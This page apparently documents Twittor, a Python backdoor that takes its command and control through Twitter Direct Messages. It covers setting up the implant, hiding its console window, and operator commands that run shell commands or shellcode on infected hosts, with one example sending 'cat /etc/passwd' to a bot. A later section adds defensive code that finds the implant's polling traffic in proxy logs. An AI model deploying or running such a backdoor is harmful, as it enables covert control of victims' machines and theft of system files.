Twittor is a stealthy Python-based backdoor that uses Twitter Direct Messages as its command and control (C&C) channel. The project was inspired by Gcat, which does the same thing using a Gmail account.
Setup
For this to work you need:
- A Twitter account (Use a dedicated account! Do not use your personal one!)
- Register an app on Twitter with the "Read, write, and direct messages" access level.
Install the dependencies:
$ pip install -r requirements.txt
This repo contains two files:
- twittor.py, which is the client
- implant.py, the actual backdoor to deploy
In both files, edit the access token part and add the ones that you previously generated:
CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
You're probably going to want to compile implant.py into an executable using PyInstaller. To get rid of the console window when compiling with PyInstaller, the flags --noconsole --onefile will help. Just saying.
Usage
In order to run the client, launch the script.
$ python twittor.py
You'll then get an 'interactive' shell that offers a few commands:
$ help
refresh - refresh C&C control
list_bots - list active bots
list_commands - list executed commands
!retrieve <jobid> - retrieve jobid command
!cmd <MAC ADDRESS> command - execute the command on the bot
!shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
help - print this usage
exit - exit the client
$
Once you've deployed the backdoor on a couple of systems, you can check the available clients using the list_bots command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$
The output shows the MAC address, which is used to uniquely identify the system, followed by information about the OS the implant is running on; in this case a Linux box.
Let’s issue a command to an implant:
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$
Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd; the script then outputs the jobid that we can use to retrieve the output of that command.
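Because the implant has to poll the Twitter API for new Direct Messages, the signal a defender can look for is a non-browser client on a host calling that API at a machine-regular cadence. The following is an added example, not part of Twittor, of that check run over constructed proxy log lines; the host name api.twitter.com, the log format, the browser heuristic and the thresholds are all assumptions to be tuned to real proxy data.

```python
"""Flag hosts that poll the Twitter API at a machine-regular cadence from a
non-browser client: the traffic shape a Direct-Message C2 like Twittor produces."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (not from the page): "timestamp src_ip dest_host user_agent"
SAMPLE_LOG = """\
2023-01-01T10:00:00 10.0.0.5 api.twitter.com python-requests/2.31
2023-01-01T10:00:30 10.0.0.5 api.twitter.com python-requests/2.31
2023-01-01T10:01:00 10.0.0.5 api.twitter.com python-requests/2.31
2023-01-01T10:01:30 10.0.0.5 api.twitter.com python-requests/2.31
2023-01-01T10:02:00 10.0.0.5 api.twitter.com python-requests/2.31
2023-01-01T10:00:07 10.0.0.9 api.twitter.com Mozilla/5.0 (Windows NT 10.0) Firefox/110
2023-01-01T10:04:41 10.0.0.9 api.twitter.com Mozilla/5.0 (Windows NT 10.0) Firefox/110
2023-01-01T10:05:02 10.0.0.9 api.twitter.com Mozilla/5.0 (Windows NT 10.0) Firefox/110
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")
TWITTER_API_HOSTS = {"api.twitter.com"}  # assumption: API host the implant polls

def parse_twitter_requests(log):
    """Yield (timestamp, src_ip, user_agent) for each request to a Twitter API host."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(3) in TWITTER_API_HOSTS:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(4)

def find_beacons(log, min_hits=4, max_jitter=0.2):
    """Return {src_ip: (mean_period_seconds, user_agent)} for sources whose gaps
    between API calls are near-constant and whose client is not a browser."""
    by_src = defaultdict(list)
    for ts, src, ua in parse_twitter_requests(log):
        by_src[src].append((ts, ua))
    beacons = {}
    for src, events in by_src.items():
        if len(events) < min_hits:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean  # coefficient of variation
        ua = events[0][1]  # assumption: one client per source in this window
        if jitter <= max_jitter and not ua.startswith("Mozilla/"):
            beacons[src] = (mean, ua)
    return beacons
```

A hit is a starting point for triage (which process on the host owns the connection), not a verdict; legitimate scheduled integrations will also show a fixed period.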
You can download Twittor here:
Or read more here.